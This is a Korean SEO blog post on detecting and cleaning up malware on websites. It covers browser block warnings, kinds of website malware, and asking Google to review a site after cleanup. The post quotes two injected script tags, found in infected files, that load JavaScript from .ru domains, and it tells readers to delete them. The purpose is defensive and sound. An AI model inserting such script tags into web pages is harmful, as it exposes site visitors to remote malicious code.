검색엔진최적화 – 웹사이트 악성코드 감염여부 확인 및 대처법

검색엔진최적화 – 웹사이트 악성 코드에 감염여부 확인 및 대처법구글 크롬 브라우저의 유해성 사이트 경고 문구

검색엔진최적화를 의뢰받아 관리를 하다보면 여러가지 어려움을 겪기도 한다. 그 중의 하나가 악성코드에 의해 브라우저 차단 문제이다. 이것은 단순히 구글크롬, 파이어폭스 등 브라우저 상의 차단으로 접속 문제만이 아닌 사이트의 이미지를 훼손할 수 있는 중대한 문제라고 받아 들여야 한다.
파이어폭스 악성코드 경고 페이지
국내 유명 신문사 사이트도 접속할려고 하면 악성 코드 경고 페이지를 먼저 보게 된다. 그럴 경우 사이트에 대한 신뢰성은 상당히 떨어진다. 물론 외부에 의해 숨겨진 악성코드가 아닌 내부에서 의도적으로 숨겨놓은 iframe이나 js파일이 있을 수도 있지만 그 또한 접속자 몰래 뭔가를 알아 낼려는 엉큼한 의도는 사실임이 분명하다.

악성코드란?
일반적으로 보안이 취약하여 해커가 사이트를 제어하기 때문에 사이트가 감염됩니다. 해커는 사이트의 콘텐츠를 변경(예: 스팸 추가)하거나 대개 사용자를 속여 개인 및 신용카드 정보를 빼내는 피싱(Phishing) 페이지를 사이트에 추가할 수 있습니다. 또는 악성 코드(예: 페이지를 표시하는 컴퓨터를 공격하는 다른 웹사이트에서 콘텐츠를 가져오는 스크립트 또는 iFrame)를 삽입할 수 있습니다.

‘악성 코드’라는 용어에는 컴퓨터나 네트워크에 피해를 주기 위해 만들어진 모든 종류의 악성 소프트웨어가 포함됩니다. 악성 코드 유형에는 바이러스, 웜, 스파이웨어 및 트로이 목마가 포함되지만 이에 국한되지 않습니다. 해킹을 당한 사이트나 컴퓨터는 피싱(Phishing) 사이트(사용자를 속여 개인 및 신용카드 정보를 빼내도록 만들어진 사이트) 같은 악성 콘텐츠를 호스팅하는 데 사용될 수 있습니다. 몇몇 해커의 경우 해킹된 사이트에 대한 관리 권한을 가질 수도 있습니다.

검색엔진최적화 차원에서도 이런 악성코드에 의해 블럭 당하는 것은 좋지 못하다.

구글 검색 결과 페이지에도 악성코드 감염 표시를 하게 되어 클릭을 꺼리게 되겠지만 블라인드 처리되어 입게되는 이미지 손상이 더 크게 여겨진다.

혹시, 갑자기 사이트 속도가 느려진다던지 로딩시 이상한 웹사이트가 로딩이 되는 것을 브라우저 상태바로 볼 수 있는 경우 반드시 악성코드 감염여부를 확인하여야 한다.

 

 

우선 악성코드 감염여부 및 이를 통한 블랙리스트에 포함되었는지 점검해보자.

필자의 경험으로는 대부분의 감염파일은 .js파일이나 index 파일에 악성 코드가 숨겨져 있다.

파일 맨 하단에 아래와 같이 코드를 추가 해놓았었다.

 

<script type=”text/javascript” src=”http://saltychin.ru/Heat_Sink.js”></script>

<script type=”text/javascript” src=”http://greatrow.ru/Heat_Sink.js”></script>

이것을 찾아서 모두 삭제하기만 하면 된다.

아래는 대부분의 악성 코드 유형이다.

1. 악성 스크립트(Malicious scripts)
안티 바이러스 프로그램으로 감지되기 어렵다.picture of deceptive script

2. 아파치 서버 .htaccess redirects
아파치 서버를 사용하는 경우 .htaccess를 리디렉트로 활용하는 경우가 있는데 악성코드 감염시
리디렉트를 다른 사이트로 연결되도록 해놓은 경우가 있다.

3. 숨김 iframes

picture of a hidden iframe injected in a web page

악성코드를 모두 삭제하였다면 Google에 요청하여 검색결과에 사이트를 포함하도록 재검토를 요청할 수 있다.

구글에 재검토를 요청하려면 다음 단계를 따르면 된다.

  1. Google 계정으로 웹마스터 도구에 로그인합니다.
  2. 재검토를 요청할 사이트를 추가하고 확인했는지 검토합니다.
  3. 사이트의 재검토 요청

참조: 구글에서 제공하는 악성코드 대처방법

2 thoughts on “검색엔진최적화 – 웹사이트 악성코드 감염여부 확인 및 대처법

  1. 웹사이트를 통해서 이런일이 벌어진다니 ;;

    과거 586을 사용할 때에는 상상도 못했던 일들이 벌어지는 군요 ㅠ ㅠ
    (당시가 컴퓨터에 미쳐살때 ㅋㅋ)

    1. 최근 이런 웹사이트 파일 감염사례가 자주 보는 것 같습니다. 주로 웹호스팅 할 때 같은 서버의 다른 업체가 감염되어 전염되는 것으로 생각됩니다^^

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다

이 사이트는 스팸을 줄이는 아키스밋을 사용합니다. 댓글이 어떻게 처리되는지 알아보십시오.